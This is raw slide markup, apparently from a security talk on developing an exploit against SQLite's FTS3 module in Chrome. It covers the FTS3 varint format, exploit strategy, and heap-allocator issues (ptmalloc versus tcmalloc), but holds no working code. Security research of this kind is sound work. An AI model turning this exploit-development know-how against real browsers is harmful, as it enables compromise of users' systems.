            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Connector 42"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="41" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3534551" y="4435881"/>
            <a:ext cx="756848"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5" name="Straight Connector 44"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1780152" y="4435881"/>
            <a:ext cx="842574"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4442025" y="4186622"/>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7051051" y="4186622"/>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5262051" y="4251337"/>
            <a:ext cx="911825" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Connector 56"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6173876" y="4435881"/>
            <a:ext cx="877175"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8" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4442025" y="4435881"/>
            <a:ext cx="820026"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7189807" y="4186500"/>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061203" y="4186500"/>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8135815" y="4251337"/>
            <a:ext cx="911825" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9045271" y="4435881"/>
            <a:ext cx="1015932"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5" name="Straight Connector 64"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189807" y="4435881"/>
            <a:ext cx="946008" cy="12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1647825" y="3090376"/>
            <a:ext cx="8543925" cy="15302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Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436983" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Refining the exploit strategy</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1517887224"/>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2"/>
            <a:ext cx="10483273" cy="2328616"/>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2"/>
            <a:ext cx="277088" cy="232861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81731" y="1273032"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>500MB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212424" y="138544"/>
            <a:ext cx="11776375" cy="25861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2742637" y="687622"/>
            <a:ext cx="170870" cy="133059"/>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684335993"/>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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52375"/>
            <a:ext cx="1995055" cy="13111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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376208" y="277092"/>
            <a:ext cx="10483273" cy="2328616"/>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Left Brace 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1052936" y="277092"/>
            <a:ext cx="277088" cy="232861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4" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281731" y="1273032"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>500MB</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212424" y="138544"/>
            <a:ext cx="11776375" cy="25861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21681834"/>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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52375"/>
            <a:ext cx="1995055" cy="13111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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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244435"/>
            <a:ext cx="10469417" cy="369454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136326312"/>
      </p:ext>
    </p:extLst>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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52375"/>
            <a:ext cx="1995055" cy="13111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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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244435"/>
            <a:ext cx="10469417" cy="369454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Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390063"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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082792"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Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277552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346825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4160979"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4853708"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5546437"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6239166"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931895"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7624624"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8317353"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9010082"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970281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039554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11085954" y="5938979"/>
            <a:ext cx="773526"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602682202"/>
      </p:ext>
    </p:extLst>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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52375"/>
            <a:ext cx="1995055" cy="13111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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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2" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390063"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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082792"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Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277552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346825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4160979"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4853708"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5546437"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6239166"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931895"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7624624"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8317353"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9010082"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970281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039554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11085954" y="5938979"/>
            <a:ext cx="773526"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663966759"/>
      </p:ext>
    </p:extLst>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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52375"/>
            <a:ext cx="1995055" cy="13111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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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2" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390063"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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082792"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Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277552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346825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4160979"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4853708"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5546437"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6239166"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931895"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7624624"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8317353"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9010082"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970281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039554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11085954" y="5938979"/>
            <a:ext cx="773526"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4461157" y="420253"/>
            <a:ext cx="170870" cy="132121"/>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41" name="Curved Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4773135" y="325831"/>
            <a:ext cx="274276" cy="72736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5227775" y="632855"/>
            <a:ext cx="900507" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4071982757"/>
      </p:ext>
    </p:extLst>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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52375"/>
            <a:ext cx="1995055" cy="13111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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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244435"/>
            <a:ext cx="10469417" cy="3694547"/>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TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481860" y="3328995"/>
            <a:ext cx="10261600" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BIG APPLE</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390063"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2082792"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277552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346825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4160979"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4853708"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5546437"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6239166"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6931895"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7624624"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8317353"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9010082"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970281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039554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11085954" y="5938979"/>
            <a:ext cx="773526"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126254961"/>
      </p:ext>
    </p:extLst>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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52375"/>
            <a:ext cx="1995055" cy="13111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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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244435"/>
            <a:ext cx="10469417" cy="3694547"/>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TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481860" y="3328995"/>
            <a:ext cx="10261600" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BIG APPLE</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390063"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2082792"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277552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346825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4160979"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4853708"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5546437"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6239166"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6931895"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7624624"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8317353"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9010082" y="5938979"/>
            <a:ext cx="692729" cy="136242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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970281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039554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11085954" y="5938979"/>
            <a:ext cx="773526"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399298" y="2260602"/>
            <a:ext cx="692729" cy="136242"/>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Curved Connector 2"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="44" idx="1"/>
            <a:endCxn id="40" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1" flipV="1">
            <a:off x="1399297" y="2328723"/>
            <a:ext cx="7957149" cy="3610256"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -4846"/>
              <a:gd name="adj2" fmla="val 56316"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>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59748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Fts3 Variable Length Integer Format</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620484" y="3371468"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000111</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4234541" y="3371468"/>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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000100</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848598" y="3367031"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6000" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9638521" y="2911149"/>
            <a:ext cx="2024743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Least Significant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517843" y="2911149"/>
            <a:ext cx="2024743" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>← </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Most Significant</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4954557"/>
            <a:ext cx="10515600" cy="1306285"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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rgbClr val="5B5B5B"/>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Split every </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7 bits</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1686552926"/>
      </p:ext>
    </p:extLst>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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52375"/>
            <a:ext cx="1995055" cy="13111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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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9" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390063"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2082792"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277552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346825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4160979"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4853708"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5546437"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6239166"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6931895"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7624624"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8317353"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9010082" y="5938979"/>
            <a:ext cx="692729" cy="136242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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970281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039554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11085954" y="5938979"/>
            <a:ext cx="773526"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630291358"/>
      </p:ext>
    </p:extLst>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390063" y="284018"/>
            <a:ext cx="10469417" cy="196041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Rectangle 59"/>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3565226" y="552375"/>
            <a:ext cx="1995055" cy="13111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Rectangle 65"/>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Rectangle 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7527627" y="558799"/>
            <a:ext cx="4331853" cy="12247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2881737" y="424873"/>
            <a:ext cx="812798" cy="127503"/>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Rectangle 69"/>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2742637" y="690923"/>
            <a:ext cx="170870" cy="129758"/>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244435"/>
            <a:ext cx="10469417" cy="369454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Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390063"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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082792" y="5941287"/>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Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277552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346825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4160979"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4853708"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5546437"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6239166"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931895"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7624624"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8317353"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9702811"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0395540" y="5938979"/>
            <a:ext cx="692729"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11085954" y="5938979"/>
            <a:ext cx="773526" cy="13624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9010082" y="5938979"/>
            <a:ext cx="692729" cy="136242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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41" name="Picture 6" descr="mario star iconì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼"/>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34394" y="3702580"/>
            <a:ext cx="502272" cy="502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7355433"/>
      </p:ext>
    </p:extLst>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Freddie mercury"/>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549736" y="1879404"/>
            <a:ext cx="917798" cy="87002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8200" y="96677"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Emotion curve while developing the exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="699796" y="3172406"/>
            <a:ext cx="410547" cy="671804"/>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51930" y="3928185"/>
            <a:ext cx="726233" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Start </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353786" y="2155770"/>
            <a:ext cx="1754930" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Come up with an exploit strategy in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ptmalloc</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119673" y="3167740"/>
            <a:ext cx="410547" cy="1833466"/>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810207" y="5029192"/>
            <a:ext cx="1754930" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>What the Eff Chrome uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>tcmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>??? Throws POC away to trashcan</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
